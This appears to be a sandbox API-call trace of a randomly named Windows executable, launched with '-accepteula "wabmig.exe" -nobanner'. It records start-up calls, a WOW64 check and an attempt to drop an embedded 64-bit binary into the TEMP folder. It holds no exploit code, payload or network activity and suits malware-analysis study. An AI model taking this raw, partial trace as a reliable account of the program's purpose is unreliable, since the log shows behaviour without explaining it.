GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0200.356] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0200.356] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0200.357] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0200.358] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0200.359] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0200.360] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0200.360] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0200.360] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0200.360] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0200.360] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0200.375] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3bc) returned 0x5360a8 [0200.375] GetCurrentThreadId () returned 0xa48 [0200.375] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x536470 [0200.376] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x536490 [0200.376] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x454e7df7, hStdError=0x0)) [0200.376] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0200.376] GetFileType (hFile=0x3) returned 0x2 [0200.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0200.376] GetFileType (hFile=0x80) returned 0x3 [0200.377] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0200.377] GetFileType (hFile=0xb) returned 0x2 [0200.377] GetCommandLineW () returned="tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner" [0200.377] GetEnvironmentStringsW () returned 0x536c98* [0200.377] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb7c) returned 0x537820 [0200.380] FreeEnvironmentStringsW (penv=0x536c98) returned 1 [0200.380] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0200.380] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x70) returned 0x536c98 [0200.383] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xa0) returned 0x536d10 [0200.383] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e) returned 0x5383c0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6c) returned 0x536db8 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x6e) returned 0x536e30 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x78) returned 0x52f8c8 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x62) returned 0x536ea8 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x536f18 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x536f50 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x20) returned 0x535a78 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x28) returned 0x536fa0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1a) returned 0x535aa0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4a) returned 0x536fd0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x72) returned 0x52f948 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x537028 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x537060 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1c) returned 0x535ac8 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xd2) returned 0x537098 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x7c) returned 0x537178 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x537200 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3a) returned 0x538408 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x90) returned 0x537240 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x5372d8 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x537308 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x36) returned 0x537340 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x48) returned 0x537380 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x5373d0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x538450 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x18) returned 0x537430 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x82) returned 0x537450 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2e) returned 0x5374e0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1e) returned 0x535af0 [0200.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2c) returned 0x537518 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x537550 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x52) returned 0x5375b0 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x2a) returned 0x537610 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c) returned 0x538498 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x537648 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x24) returned 0x5376a8 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x30) returned 0x5376d8 [0200.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x8c) returned 0x537710 [0200.914] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537820 | out: hHeap=0x520000) returned 1 [0200.935] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x800) returned 0x5377a8 [0200.935] GetLastError () returned 0x0 [0200.935] SetLastError (dwErrCode=0x0) [0200.935] GetLastError () returned 0x0 [0200.935] SetLastError (dwErrCode=0x0) [0200.936] GetLastError () returned 0x0 [0200.936] SetLastError (dwErrCode=0x0) [0200.936] GetACP () returned 0x4e4 [0200.936] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x220) returned 0x537fb0 [0200.936] GetLastError () returned 0x0 [0200.936] SetLastError (dwErrCode=0x0) [0200.936] IsValidCodePage (CodePage=0x4e4) returned 1 [0200.936] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0200.936] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0200.938] GetLastError () returned 0x0 [0200.938] SetLastError (dwErrCode=0x0) [0200.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0200.941] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0200.941] GetLastError () returned 0x0 [0200.941] SetLastError (dwErrCode=0x0) [0200.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0200.941] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0200.941] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0200.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿg|NEäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0200.941] GetLastError () returned 0x0 [0200.942] SetLastError (dwErrCode=0x0) [0200.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0200.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0200.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0200.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿg|NEäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0200.942] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x80) returned 0x5381d8 [0201.227] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0201.228] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0201.228] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x5381d8) returned 0x80 [0201.228] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0201.229] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0201.229] GetCurrentProcess () returned 0xffffffff [0201.229] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0201.229] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0201.229] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0201.231] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0201.231] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0201.231] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0201.231] LockResource (hResData=0x43c648) returned 0x43c648 [0201.232] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x538260 [0201.233] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.250] GetLastError () returned 0x20 [0201.250] GetLastError () returned 0x20 [0201.250] SetLastError (dwErrCode=0x20) [0201.250] GetLastError () returned 0x20 [0201.251] SetLastError (dwErrCode=0x20) [0201.251] GetLastError () returned 0x20 